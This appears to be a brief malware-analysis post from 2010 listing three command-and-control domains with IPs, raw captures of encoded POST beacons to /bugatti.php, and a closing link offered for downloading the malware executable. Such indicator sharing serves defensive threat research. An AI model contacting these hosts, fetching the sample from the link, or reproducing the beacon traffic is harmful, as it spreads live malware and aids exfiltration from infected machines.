3 domains found from this malware and multiple tasks are called from same exe file
exe is uploaded by mysterii
DNS:
verseuable.com: type A, class IN, addr 64.191.16.70
twindu.net: type A, class IN, addr 77.120.109.3
cogiicio.com: type A, class IN, addr 87.255.51.229
HTTP:
Data:
POST /bugatti.php?ini=v22Mm2fmToX7DzVq7FBHROc/POW6dtZpa4xZTXQhKB9UBFbWihPdnz2vDFrHIQqMgMqV7MpGegiBMF4YGmLzfIyRtufQpaX/NPtque7okw== HTTP/1.1
RAW:
..’.?…’..K..E..-.R@…^…o.@..F.O.PQ..2….P.……POST /bugatti.php?ini=v22Mm2fmToX7DzVq7FBHROc/POW6dtZpa4xZTXQhKB9UBFbWihPdnz2vDFrHIQqMgMqV7MpGegiBMF4YGmLzfIyRtufQpaX/NPtque7okw== HTTP/1.1..Content-Type:application/x-www-form-urlencoded..Host: verseuable.com..User-Agent: Mozilla/6.0 (Windows; wget3.0)..Content-Length: 193..Connection: close..Cache-Control: no-cache….data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+uo+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45
.’..K..’.?…E.…^@.?...@..F..o..P.O....Q..7P.. .1..HTTP/1.1 404 Not Found..Server: nginx/0.7.67..Date: Fri, 12 Nov 2010 18:57:38 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: close..X-Powered-By: PHP/5.2.11….18e..;..<HEAD>….</HEAD>..Not Found..The requested URL /bugatti.php?ini=v22Mm2fmToX7DzVq7FBHROc/POW6dtZpa4xZTXQhKB9UBFbWihPdnz2vDFrHIQqMgMqV7MpGegiBMF4YGmLzfIyRtufQpaX/NPtque7okw== was not found on this server.<P
..’.?…’..K..E..).o@….5..o.Mxm..P.P...e…~P.…W..POST /bugatti.php?ini=v22Mm2fmToX7DzVq7FBHROc/POW6dtZpa4xZTXQhKB9UBFbWihPdnz2vDFrHIQqMgMqV7MpGegiBMF4YGmLzfIyRtufQpaX/NPtque7okw== HTTP/1.1..Content-Type:application/x-www-form-urlencoded..Host: twindu.net..User-Agent: Mozilla/6.0 (Windows; wget 3.0)..Content-Length: 193..Connection: close..Cache-Control: no-cache….data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+uo+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45
Download exe file here if i want to search for more:
http://d785bff2.ubucks.net